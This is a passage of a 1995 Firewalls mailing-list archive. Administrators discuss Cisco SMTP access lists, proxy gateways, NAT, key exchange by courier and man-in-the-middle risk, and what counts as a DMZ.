Oct 1995 17:55:59 +1000 Received: from isdprod2.macbank by macbank (5.0/SMI-SVR4) id AA13453; Thu, 5 Oct 1995 17:55:57 --1000 Date: Thu, 5 Oct 1995 17:55:57 --1000 From: pcooper@macquarie.com.au (Peter Cooper) Message-Id: <9510050755.AA13453@macbank> To: Firewalls@GreatCircle.COM Subject: What's the admin effort content-length: 422 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We're considering the business case for a firewall product at the moment. I've been asked how much of a persons' (or multiple people) time would be taken up in day to day operational control of a firewall, in terms of monitoring the activity, and change management. Is there any sort of benchmarking of this activity that people are aware of, I'd be interested in any statistics or experience have had. Peter Cooper From firewalls-owner Thu Oct 5 02:22:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA17736 for firewalls-outgoing; Thu, 5 Oct 1995 02:16:40 -0700 Received: from Mailer.Uni-Marburg.DE (papin.HRZ.Uni-Marburg.DE [137.248.1.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id CAA17691 for ; Thu, 5 Oct 1995 02:15:42 -0700 Received: from sumbi01.med.Uni-Marburg.DE by Mailer.Uni-Marburg.DE (AIX 3.2/UCB 5.64/20.07.94) id AA23894; Thu, 5 Oct 1995 10:13:39 +0100 Received: by med.uni-marburg.de (8.6.12/ADD-HUB-2.1) id KAA00219; Thu, 5 Oct 1995 10:12:43 +0100 Received: from post.med.uni-marburg.de(137.248.202.51) by sumbi01.med.uni-marburg.de via smap (V1.3) id sma000217; Thu Oct 5 10:12:28 1995 Received: from pcmbi60.med.uni-marburg.de (pcmbi60.med.uni-marburg.de [137.248.202.60]) by post.med.uni-marburg.de (8.6.11/8.6.9) with SMTP id LAA03898 for ; Thu, 5 Oct 1995 11:19:47 +0100 Message-Id: <199510051019.LAA03898@post.med.uni-marburg.de> From: "D.A. Meyer" To: firewalls@greatcircle.com Date: Thu, 5 Oct 1995 10:12:43 +0000 Subject: http-gw on dual-homed gateways Reply-To: meyerd@post.med.uni-marburg.de Priority: normal X-Mailer: Pegasus Mail/Windows (v1.22) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, my question of the day is: has anybody tried to run TIS http-gw on a dual-homed gateway? The proxy has to rewrite the URL, and it seems to do it using the outside interface name/address (gethostname + gethostbyname). When I change the hostname so that it is connected to the IP-Adress of the internal interface, my mail-proxy won't work. Has anybody build a patch, which rewrites the adress depending on the interface on which the client-request came in? Any other idea? Thanx Dirk ----------------------------------------------------------------- Dirk A. Meyer meyerd@mailer.uni-marburg.de Klinikum der Philipps-Universitaet Marburg Tel.xx49-6421-28-6291 Med. Informatik Fax.-------------8921 Bunsenstr. 3 D-35033 Marburg/Lahn ----------------------------------------------------------------- From firewalls-owner Thu Oct 5 02:30:13 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA17587 for firewalls-outgoing; Thu, 5 Oct 1995 02:10:26 -0700 Received: from pina1.telecom.at (pina1.telecom.at [194.37.252.41]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id CAA17575 for ; Thu, 5 Oct 1995 02:09:59 -0700 Received: from pina2.telecom.at (pina2.telecom.at [194.37.252.42]) by pina1.telecom.at (8.6.10/8.6.6) with ESMTP id JAA56301 for ; Thu, 5 Oct 1995 09:59:20 +0100 Received: (from ilias@localhost) by pina2.telecom.at (8.6.10/8.6.6) id KAA23641 for firewalls@GreatCircle.COM; Thu, 5 Oct 1995 10:05:49 +0100 From: Ilias Liakopoulos Message-Id: <199510050905.KAA23641@pina2.telecom.at> Subject: cisco router extended access-list question To: firewalls@GreatCircle.COM Date: Thu, 5 Oct 1995 10:05:49 +0100 (MEZ) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1522 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, I have set up an access-list like the example in UnileverCD for allowing only SMTP connections (the IP addrs are invented): access-list 102 permit tcp 1.2.3.4 0.0.0.0 2.2.3.4 0.0.0.0 established access-list 102 permit tcp 1.2.3.4 0.0.0.0 2.2.3.4 0.0.0.0 eq 25 SMTP works but with this config I tried telnet and it also works . this is not acceptable and if I remove the established line -> nothing works. the interface config: interface Ethernet0 ip address 2.2.3.2 'some adr mask' ip access-group 102 out have I done something wrong in the config or is this a bug in our version? : Cisco Internetwork Operating System Software IOS (tm) 4000 Software (XX-K), Version 10.0(6), RELEASE SOFTWARE (fc1) Copyright (c) 1986-1994 by cisco Systems, Inc. Compiled Tue 25-Oct-94 19:29 by dougs ROM: System Bootstrap, Version 4.14(7), SOFTWARE System image file is "xk10060z", booted via flash cisco 4000 (68030) processor (revision 0xB0) with 16384K/4096K bytes of memory. Processor ID 5012216 thanx, iLiAS ---------------------------------------------------------------------- Ilias Liakopoulos | Email: ilias@telecom.at Spardat AG & Co KG | Tel: 0043/1/74045-4762 Fax -5704 Geiselbergstr. 21-25 | WWW: http://pina2.telecom.at/~lia 1110-Vienna | nic-hdl: IL7-RIPE Austria | Europe | ---------------------------------------------------------------------- From firewalls-owner Thu Oct 5 02:39:11 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA17525 for firewalls-outgoing; Thu, 5 Oct 1995 02:07:37 -0700 Received: from funet.fi (funet.fi [130.230.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id CAA17518 for ; Thu, 5 Oct 1995 02:07:26 -0700 Received: from relevantum.fi (actually user nobody@relevantum.fi) by funet.fi with SMTP (PP); Thu, 5 Oct 1995 11:05:51 +0200 Received: by relevantum.fi (4.1/SMI-4.1-MHS-7.0) id AA01811; Thu, 5 Oct 95 11:05:44 +0200 Date: Thu, 5 Oct 1995 11:05:43 +0200 (EET) From: Keinanen Vesa To: Paul A Vixie Cc: firewalls@greatcircle.com Subject: Re: Network Address Translation stuff In-Reply-To: <9510050656.AA27394@wisdom.home.vix.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 4 Oct 1995, Paul A Vixie wrote: > The trick is to use an FTP proxy without the client having to know that > it's talking to an FTP proxy. With a simple DNS trick and a complicated > FTP proxy, you can make these ends meet. > OK I get it, IBM NAT box has application level proxies inside instead of pakcet-per-packet address translation. (BTW, Do you know where I can find info about this IBM box. Quick search on IBM Web site didn't get me anything) Let me try to summarize this subject a bit. There seems to be (at least) 2 different techniques for address translation: * Translate IP addresses on each IP packet that goes through, otherwise let packets go through unmodified. Handling FTP requires some dirty tricks like modifying data inside IP-pakets that contain FTP PORT commands. Invisible to users. * Use application level proxies. This can be made unvisible to users by using transparent proxies. Packet-by-packet address translation may be dirty in some sense, but on other hand it doesn't requre own process on each connection and requires just a little of state information. It can be implemented on standalone box with no disks and limited main memory (like router). Maybe some day someone will announce "proxy firewall router" which claims to have best features of both worlds. Maybe in this moment guys in translation.com are rewriting their sales material and "new" kind of out-of-box Firewall will pop into market. VK -- Vesa Keinanen Nasilinnankatu 24 D, 33210 Tampere, Finland Relevantum Oy Phone +358 31 2147200, Fax +358 31 2147402 From firewalls-owner Thu Oct 5 02:52:45 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA18352 for firewalls-outgoing; Thu, 5 Oct 1995 02:48:39 -0700 Received: from enny01.enicom.co.jp (enny01.enicom.co.jp [202.33.90.66]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id CAA18345 for ; Thu, 5 Oct 1995 02:48:33 -0700 Received: by enny01.enicom.co.jp (8.6.12+2.4W/3.3W9/enicom1995.05.19) with UUCP id SAA11784 for firewalls@GreatCircle.COM; Thu, 5 Oct 1995 18:45:22 +0900 Received: from re.enicom.co.jp by enicom.rd.enicom.co.jp (8.6.12+2.5Wb7/3.3W9/enicom5.0) with ESMTP id SAA22628 for ; Thu, 5 Oct 1995 18:47:24 +0900 Received: from (MTD2001 [133.179.8.32]) by re.enicom.co.jp (8.6.11+2.4W/3.4W/re1.4) with SMTP id SAA14194 for firewalls@GreatCircle.COM; Thu, 5 Oct 1995 18:44:09 +0900 Date: Thu, 5 Oct 1995 18:44:09 +0900 Message-Id: <199510050944.SAA14194@re.enicom.co.jp> From: Shuzo Ishihara To: firewalls@GreatCircle.COM Mime-Version: 1.0 Subject: Please tell me adequate books and articles about Firewalls. Content-Type: text/plain; charset=iso-2022-jp X-Mailer: Winbiff [version 1.07] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm novice of Internet and Firewall securities. I have read the book , "Firewalls and Internet Security" by William R.Cheswick, Steven M.Bellovin. This book is very useful and I learned the framework of Firewall. But there is a cupple of models of firewalls in this book. I think that there are more types of model about firewalls , and I need more systemized learning about them. I'm very grateful for someone , who would tell me the source of informations containing illustration, that is , books, aritcles and others. S.Ishihara $B!!!!(J ishihara@re.enicom.co.jp From firewalls-owner Thu Oct 5 03:22:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA18956 for firewalls-outgoing; Thu, 5 Oct 1995 03:07:17 -0700 Received: from mn3.swip.net (mn3.swip.net [192.71.180.33]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA18949 for ; Thu, 5 Oct 1995 03:07:11 -0700 Received: by mn3.swip.net with UUCP (8.6.8/2.01) id LAA13635; Thu, 5 Oct 1995 11:03:16 +0100 Received: from mfvlh.microfront.se by mfsvinx.microfront.se id aa03177; Thu, 5 Oct 95 10:42:56 MET To: Firewalls@greatcircle.com From: Lars Hornborg Subject: Re: Address Translators X-Originating-Host: lhpc Reply-To: lasseh@microfront.se In-Reply-To: <199509291355.GAA01364@miles.greatcircle.com> Message-Id: <1995Oct05.110526+0200@lhpc> Date: 05 Oct 1995 11:05:24 +0200 MIME-Version: 1.0 X-Mailer: BWMail for Windows Version 3.2 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A commercial NAT product is Private Internet Exchange from Network Translation Inc. Any positive things I say about it on this list would be biased, since we distribute it in Sweden, but I'll say this: It's a helluva product! NTI have a Web site at www.translation.com. Lars. PS Any thoughts regarding weaknesses or strengths in this kind of solution are welcome, since the NAT approach is fairly new and needs to be discussed. DS -- __________________________________________________________________________ Lars Hornborg, Tech mgr Tel: +46-47010150 Microfront Vaxjo AB Fax: 21150 (67929 home) Sjoeuddev 8, Internet: lasseh@microfront.se S-352 46 VAXJO, SWEDEN X400: /S=lasseh/P=microfront/A=interx/C=se _________________________________________________________________________ From firewalls-owner Thu Oct 5 03:30:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA19295 for firewalls-outgoing; Thu, 5 Oct 1995 03:21:51 -0700 Received: from sun2.nsfnet-relay.ac.uk (sun2.nsfnet-relay.ac.uk [128.86.8.45]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id DAA19288 for ; Thu, 5 Oct 1995 03:21:46 -0700 Message-Id: <199510051021.DAA19288@miles.greatcircle.com> Via: uk.co.salford-software-services.e; Thu, 5 Oct 1995 11:19:57 +0100 Received: from 193.37.229.23.sss.co.uk (actually pc4.sss.co.uk) by e.sss.co.uk with SMTP (PP); Thu, 5 Oct 1995 09:54:02 +0000 From: Dave Wade To: Firewalls@GreatCircle.COM Subject: Re: Mail proxy X-Mailer: ProntoIP [version 1.5 Beta] MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: quoted-printable Date: Thu, 5 Oct 1995 09:54:06 +0000 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>1) it is *impossible* to prevent a determined individual from >>transferring executables via email. (But you can slow them down) > >Quibble: if you block the common mechanisms, then it will take ->two<- >individuals, one - perhaps unwitting - to install the decode/execute >mechanism on the inside. Rather than invent a new encoding the two individuals might just use the = SNAIL MAIL to exchange programs. Floppies through the mail normaly give a= consitant through put at low cost and avoid all those nasty scanners in t= he firewall. Much less tracable as well in most companies. Warmley, Dave Wade dw@sss.co.uk From firewalls-owner Thu Oct 5 04:22:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA21202 for firewalls-outgoing; Thu, 5 Oct 1995 04:16:56 -0700 Received: from gateway.toploguk.co.uk (gateway.toploguk.co.uk [193.119.169.250]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id EAA21195 for ; Thu, 5 Oct 1995 04:16:36 -0700 From: Paul Crossley To: ilias.liakopoulos@telecom.at, firewalls@GreatCircle.COM Subject: cisco router extended access-list question X-Mailer: ScoMail 1.0 Date: Thu, 5 Oct 1995 12:07:28 +0100 (BST) Message-ID: <9510051207.aa21699@gateway.toploguk.co.uk> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > I have set up an access-list like the example in UnileverCD > for allowing only SMTP connections (the IP addrs are invented): > > access-list 102 permit tcp 1.2.3.4 0.0.0.0 2.2.3.4 0.0.0.0 established > access-list 102 permit tcp 1.2.3.4 0.0.0.0 2.2.3.4 0.0.0.0 eq 25 > > SMTP works but with this config I tried telnet and it also works . > this is not acceptable and if I remove the established line -> > nothing works. > the interface config: > > interface Ethernet0 > ip address 2.2.3.2 'some adr mask' > ip access-group 102 out The established keyword allows any established tcp session through the interface. SMTP may be initiated from the "wrong" side so it will not be established in the first instance so another filter is required. What your filters are doing is saying is that any packets destined for hosts connected to (inside) ethernet0 will be allowed out so long as the tcp session was initiated from a host on ethernet0, this is because they are part of an "established" session. Because SMTP connections may be initiated from hosts that are not connected to ethernet0 a second filter is required to allow smtp sessions out to ethernet0. Your telnet probably works because you are initiating the connection from a host connected to (inside) ethernet0, the response packets will therefore be permitted out through ethernet0 by the "established" filter. If you try telneting to a host connected to ethernet0 from another interface I think that you'll find that you can't. Without the established line, the only thing that should work is SMTP from any interface other than ethernet0 to a host on ethernet0. It occurrs to me that you may simply need to change your "out" to an "in" as I think you've got your logic reversed. ------------------------------------------------------------------------- Paul Crossley (paul@toploguk.co.uk) Senior Consultant SCO ACE TopLog Limited TopLog House, Knaves Beech Business Centre, Loudwater, Bucks. HP10 9QY Phone (01628) 819444 Fax (01628) 819356 ------------------------------------------------------------------------- From firewalls-owner Thu Oct 5 04:52:46 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA21584 for firewalls-outgoing; Thu, 5 Oct 1995 04:46:34 -0700 Received: from gatekeeper.frontec.se (gatekeeper.frontec.se [193.13.192.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA21577 for ; Thu, 5 Oct 1995 04:46:28 -0700 Received: from tintin.lule.frontec.se (root@tintin.lule.frontec.se [192.36.15.4]) by gatekeeper.frontec.se (8.6.12/8.6.6) with SMTP id MAA26791 for ; Thu, 5 Oct 1995 12:45:00 +0100 Received: from lobo.lule.frontec.se by tintin.lule.frontec.se with SMTP id AA01670 (5.67a8/IDA-1.5 for ); Thu, 5 Oct 1995 12:44:58 +0100 Date: Thu, 5 Oct 1995 12:44:58 +0100 From: Petter H{ggman Message-Id: <199510051144.AA01670@tintin.lule.frontec.se> To: firewalls@GreatCircle.COM Subject: Re: cisco router extended access-list question X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ilias.liakopoulos@telecom.at wrote: > > Hello, > > I have set up an access-list like the example in UnileverCD > for allowing only SMTP connections (the IP addrs are invented): > > access-list 102 permit tcp 1.2.3.4 0.0.0.0 2.2.3.4 0.0.0.0 established > access-list 102 permit tcp 1.2.3.4 0.0.0.0 2.2.3.4 0.0.0.0 eq 25 > > SMTP works but with this config I tried telnet and it also works . > this is not acceptable and if I remove the established line -> > nothing works. > the interface config: > > interface Ethernet0 > ip address 2.2.3.2 'some adr mask' > ip access-group 102 out > > have I done something wrong in the config or is this a bug > in our version? : > [snip] You can use access lists on both incoming and outgoing packets, and if what you want to accomplish is SMTP connections to and from your host, this should work: interface Ethernet0 ip address 2.2.3.2 'some adr mask' ip access-group 101 in ip access-group 102 out ! Allow SMTP connections from all to "my_host" access-list 101 permit tcp 0.0.0.0 255.255.255.255 "my_host" 0.0.0.0 eq 25 ! Allow connections from all to "my_host" that's established access-list 101 permit tcp 0.0.0.0 255.255.255.255 "my_host" 0.0.0.0 established ! Allow "my_host" to connect to all on port SMTP access-list 102 permit tcp "my_host" 0.0.0.0 0.0.0.0 255.255.255.255 eq 25 ! Must allow tcp established on outgoing packets to make connection possible access-list 102 permit tcp "my_host" 0.0.0.0 0.0.0.0 255.255.255.255 established This should make only SMTP connections allowed in and out. Note that this is not the only way to do this, and one can apply small changes that totally changes the filtering function.(For example consider 'gt 1023' instead of 'established' on the second line of access list 102, which would allow your host to use any service on all that resides on ports above 1023!) Also note that when using filters both on incoming and outgoing packets, one has to read both filters at the same time to see the functionality, but that's what's fun about access-lists...;-) Hope this'll help you on the way..:-) /Petter -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Petter Haggman Email: Petter.Haggman@lule.frontec.se Arctic Software AB Phone: +46 920 75116 , Fax: +46 920 75199 Aurorum 1, S-977 75 Lulea, Sweden NMT: 010 - 259 42 77 From firewalls-owner Thu Oct 5 06:22:52 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA23065 for firewalls-outgoing; Thu, 5 Oct 1995 06:11:05 -0700 Received: from scifi.maid.com (scifi.emi.net [204.181.45.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA23056 for ; Thu, 5 Oct 1995 06:10:57 -0700 Received: (from njs@localhost) by scifi.maid.com (8.6.11/8.6.9) id JAA30854; Thu, 5 Oct 1995 09:07:48 -0400 Date: Thu, 5 Oct 1995 09:07:48 -29900 From: Nick Simicich Subject: Re: Encryption strength To: Brett Lymn cc: firewalls@GreatCircle.COM In-Reply-To: <9510050230.AA10917@bunya.awadi> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 5 Oct 1995, Brett Lymn wrote: > According to Nick Simicich: > > > >The new version of IBM's firewall provides this function. To set up a > >secure channel, you describe the channel, and it cuts a diskette, which > >you fedex to the other party. > > > > How .... ummmmm..... trusting of you. I suppose it really depends on > the level of security you are looking for but you did consider that > the fedex package may get intercepted? Delivered to the incorrect > person (say, the janitor)? I knew as soon as I sent this that I was courting trouble from two points: 1. People would assume that I was advertising Fedex as a secure channel. I wasn't. I was advertising it as a 'different', non-network channel. 2. People would assume that I was somehow endorsing Federal Express. Generally, IBM's deal is with Airbourne :-). Hmmm...at some point, you have to trust someone. Is fedex (generic term for overnight courier, like asprin for ASA :-) [now I expect a letter from Federal Express - please remember that I'm speaking for myself] a secure channel? No, but if you are that paranoid and your data is that valuable, you carry the key there yourself. I knew that I should have said, "You pick a courier that you can trust, depending on your level of paranoia - anyone from Fedex to your company CEO making a special trip depending on your level of trust and the value of your data" but I shortcut it. No, Fedex is not a secure channel - but a network cracker is unlikely to intercept it, I suspect. They may have other worldviews. My point was that the original key exchange was not by IP on a clear channel. You could also make an image of the diskette and transfer it by secure encrypted modem connection, or you could uuencode the config files, transcribe them to onionskin paper, send them by carrier pigeon, and OCR them at the other end. Or you could FTP the unencrypted diskette image on an open network and hope that no one would intercept it. You pick the method depending on your paranoia and the value of your data. Even if you hired a Brinks armored car to make a special trip with armed guards and couriers, how do you know that they haven't been subverted such that there is a laptop on the armored car to make a copy in transit? You don't. Do you have time and the money to make an overseas trip to courier a diskette? I believe that a cracker is significantly more likely to take the network approach of breaking the end system and getting the keys once the secure channel is set up. If they are so intent on breaking you that they are intercepting your Fedex, you also have to worry about dumpster diving, people subverting employees, people kidnapping employees and stealing their ID to gain physical access to the building, armed attack and so forth. > Exchanging encryption keys is always a thorny problem since the key > _is_ your data security - if it is subverted then your encryption is > useless. Absolutely, and I didn't mean to make light of it. I did, though, and people made some good points. > -- > Brett Lymn, Computer Systems Administrator, AWA Defence Industries Nick Simicich - njs@scifi.emi.net - (last choice) njs@bcrvm1.vnet.ibm.com http://scifi.emi.net/njs.html -- Stop by and Light Up The World! From firewalls-owner Thu Oct 5 06:53:47 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA23331 for firewalls-outgoing; Thu, 5 Oct 1995 06:43:36 -0700 Received: from relay1.pipex.net (relay1.pipex.net [158.43.128.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA23324 for ; Thu, 5 Oct 1995 06:43:30 -0700 Received: from smtpgty.saicuk.co.uk by flow.pipex.net with SMTP (PP); Thu, 5 Oct 1995 14:41:57 +0100 Received: by smtpgty.saicuk.co.uk with Microsoft Mail id <3073E6D8@smtpgty.saicuk.co.uk>; Thu, 05 Oct 95 14:08:24 GMT From: "Johnson-Bryden, Ian" To: "'firewalls@greatcircle.com'" Subject: Re: Encryption strength Date: Thu, 05 Oct 95 13:48:00 GMT Message-ID: <3073E6D8@smtpgty.saicuk.co.uk> Encoding: 41 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Similar solution is one option with the Armadillo products which are also B1+ COTS products. However, the selection of a particular transit system is subject to your level of paranoia. I was involved in a system where the customer engaged an armed escort to convey the product from production to their embassy. From there it travelled under escort as a diplomatic bag transfer, and then under armed escort to the user site. Key changing is done by special messengers travelling between embassies. Thats a bit OTT for most people and either reflected the paranoia of the customer or the fact that an ending of East West tension has created a large number of redundant or potentially redundant armed guards. Ian J-B ---------- From: firewalls-owner Cc: firewalls Subject: Re: Encryption strength Date: Wednesday, October 04, 1995 8:08PM On Wed, 4 Oct 1995, David Miller wrote: > On Tue, 3 Oct 1995, Frank Willoughby wrote: > > > >From padgett's excellent mail: > But this is the crux of the chicken-and-egg problem. How do they > mutually authenticate each other? If they do it with a shared secret or > through prior arrangement a secure channel had to previously exist. If > there is no third pary/shared secret then it's subject to a > man-in-the-middle attack. The new version of IBM's firewall provides this function. To set up a secure channel, you describe the channel, and it cuts a diskette, which you fedex to the other party. > Now if *thats* been solved, I'd be *delighted* to hear about it! I thought that was what the public key distribution stuff was all about. Nick Simicich - njs@scifi.emi.net - (last choice) njs@bcrvm1.vnet.ibm.com http://scifi.emi.net/njs.html -- Stop by and Light Up The World! From firewalls-owner Thu Oct 5 07:02:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA23288 for firewalls-outgoing; Thu, 5 Oct 1995 06:40:42 -0700 Received: from gatekeeper.ddp.state.me.us (gatekeeper.ddp.state.me.us [141.114.130.70]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA23269 for ; Thu, 5 Oct 1995 06:40:35 -0700 Received: from localhost by gatekeeper.ddp.state.me.us (8.6.5/1.37) id JAA01114; Thu, 5 Oct 1995 09:33:06 -0400 Date: Thu, 5 Oct 1995 09:33:05 -0400 (EDT) From: David Miller Subject: Re: Encryption strength To: Nick Simicich cc: firewalls@GreatCircle.COM In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 4 Oct 1995, Nick Simicich wrote: > On Wed, 4 Oct 1995, David Miller wrote: > > > On Tue, 3 Oct 1995, Frank Willoughby wrote: > > > > > >From padgett's excellent mail: > > > But this is the crux of the chicken-and-egg problem. How do they > > mutually authenticate each other? If they do it with a shared secret or > > through prior arrangement a secure channel had to previously exist. If > > there is no third pary/shared secret then it's subject to a > > man-in-the-middle attack. > > The new version of IBM's firewall provides this function. To set up a > secure channel, you describe the channel, and it cuts a diskette, which > you fedex to the other party. Wouldn't you have to describe fedex as an additional channel, one which you are assuming is secure? > > Now if *thats* been solved, I'd be *delighted* to hear about it! > > I thought that was what the public key distribution stuff was all about. The public key solves part of the problem. Unfortunately it's subject to the man-in-the-middle (MITM) attack. How do *you* know that the public key you hold for me is indeed *mine*, and not that of slimey_sam, who will decrypt your secret message to me, encode it with my *real* public key, and ship along to me (along with *his* public key which I then think is *yours*)???? I agree completely that the odds of this are truly remote. Particularly for things like mailing love triangle stories via PGP. But I'd like to see a mathematical solution to the problem so that I know there's no chance whatsoever that my telnet session to my branch in France isn't being listened to by the french authorities. --- David Miller ---------------------------------------------------------------------------- It's *amazing* what one can accomplish when one doesn't know what one can't do! From firewalls-owner Thu Oct 5 07:19:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA23315 for firewalls-outgoing; Thu, 5 Oct 1995 06:43:06 -0700 Received: from relay1.pipex.net (relay1.pipex.net [158.43.128.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA23307 for ; Thu, 5 Oct 1995 06:42:59 -0700 Received: from smtpgty.saicuk.co.uk by flow.pipex.net with SMTP (PP); Thu, 5 Oct 1995 14:41:08 +0100 Received: by smtpgty.saicuk.co.uk with Microsoft Mail id <3073E6AA@smtpgty.saicuk.co.uk>; Thu, 05 Oct 95 14:07:38 GMT From: "Johnson-Bryden, Ian" To: "'firewalls@greatcircle.com'" Subject: Re: DMZ definition ? Date: Thu, 05 Oct 95 12:48:00 GMT Message-ID: <3073E6AA@smtpgty.saicuk.co.uk> Encoding: 104 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is also used sometimes to describe 'air-gapped' solutions where there is no physical link between the public and untrusted gateway and the sensitive/classified private networks. In that situation, the traffic is taken onto transfer disks which are usually then examined by the security officer on a machine which serves as a sanitation area, before being loaded to the machine which gateways to one environment only. That obviously introduces delays which can be considerable and costly. The updated version of that approach is performed on Armadillo Gargoyle systems on a single Trusted Gateway server between the two networks which permits automated transfer using personal security profiles and only requires manual intervention if a user wants to transact outside his/her profile limits. That system is in use by civil and military departments of several governments where classified and unclassified data is involved. Where manual intervention is required, the security officer performs this on the same system and authorised transfers execute electronically within the machine rather than requiring disks to be used physically between two sets of unconnected machines. This has the virtue of applying high security with good levels of access at an affordable cost, is easily re-configured and can have the automated transfer shut down any time by the security officer if the situation demands it. It is flexible in that it can handle exceptions faster than an air-gapped system. Ian J-B. ---------- From: firewalls-owner To: dasidwel Cc: firewalls Subject: Re: DMZ definition ? Date: Wednesday, October 04, 1995 10:30PM The term DMZ grew out of the border area between north and south korea (or was it vietnam, I wasn't alive for either...) We could argue all day about which of the following more exactly fit the definition of a DMZ, but that's what college professors are for :) IMHO a DMZ is any network which sits between two other networks, which, for whatever reason, have a problem with each other. ] Can anyone give me a concise defition of the term Demilitarized Zone, or DMZ See above. ] for short, in connection with firewall terminology ? I am under the belief, ] perhaps incorrectly, that it is used to refer to any kind of screened subnet ] placed between the internal networks and the Internet (or other external ] networks). Agreed. ] A colleague of mine is convinced that it is a separate subnet hung ] off a single firewall machine. That's kind of fuzzy, though it could be constructed that this 'logical' network is between the two other networks. ] 1. ] [ packet ] [ packet ] ] Internet---[filtering]----DMZ subnet----[filtering]---internal ] [ router ] (containing [ router ] networks Yep. ] 2. As above but protected by firewalls instead of packet filtering routers. Yep. ] 3. ] Internet----firewall----internal networks... ] | ] | ] DMZ ] subnet 3 == 1 logically. One could implement a system w/ 3 that did the same thing. ] Finally, does a DMZ implementation always prevent direct IP forwarding from ] Internet to internal nets ? Nope. For whatever reason, network 1) above could allow telnet's from the far left to the far right, and I'd have no problem with it, and would call it a DMZ. (actually, I would have a problem allowing telnets directly into my network, but I'd still whore myself out to the customer if their security policy allowed it. This is where me and the 'experts' part company.) -- Alan Hannan Email: alan@mid.net Network Systems/Security Voice: (402) 472-0239 MIDnet, Lincoln NOC Office Fax: (402) 472-0240 " The reasonable man adapts himself to the world; the unreasonable one persists in trying to adapt the world to himself. Therefore all progress depends on the unreasonable man. " - George Bernard Shaw From firewalls-owner Thu Oct 5 07:24:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA23322 for firewalls-outgoing; Thu, 5 Oct 1995 06:43:11 -0700 Received: from relay1.pipex.net (relay1.pipex.net [158.43.128.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA23313 for ; Thu, 5 Oct 1995 06:43:04 -0700 Received: from smtpgty.saicuk.co.uk by flow.pipex.net with SMTP (PP); Thu, 5 Oct 1995 14:41:32 +0100 Received: by smtpgty.saicuk.co.uk with Microsoft Mail id <3073E6C2@smtpgty.saicuk.co.uk>; Thu, 05 Oct 95 14:08:02 GMT From: "Johnson-Bryden, Ian" To: "'firewalls@greatcircle.com'" Subject: RE: What's the admin effort Date: Thu, 05 Oct 95 13:40:00 GMT Message-ID: <3073E6C2@smtpgty.saicuk.co.uk> Encoding: 99 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk With respect thats a 'piece of string' question because there are so many variables, including: If you have a 'roll-your-own' firewall, as many do, you may have a considerable support overhead which should not be present in a Commercial Off The Shelf, COTS product. Whether the firewall is home brewed or COTS, it could come in any one of a wide range of configurations and that range is constantly growing as different users show different needs and the market for specialised systems grows. For example, some users want a barrier but only want to permit mail to pass, while others want to permit rich access to all facilities. For many, a firewall is a system for Internet access. However, there are other Information Super Highway environments and they may grow in number. That could increase management overheads because requirements could be very different for each ISH, even if you operate everything through a single machine. Most implemented firewalls are single machines but this should be regarded as a mission critical service for most users. How you handle resilience will have management overhead implications. Many users may have a single firewall gateway to ISH, but an increasing number of users are implementing firewalls at several different locations and management overhead will vary according to how you intend to manage these different sites. Overhead for a single level, system high, security policy will be different from a multi-level secure system. Perhaps the biggest variable will be traffic types and 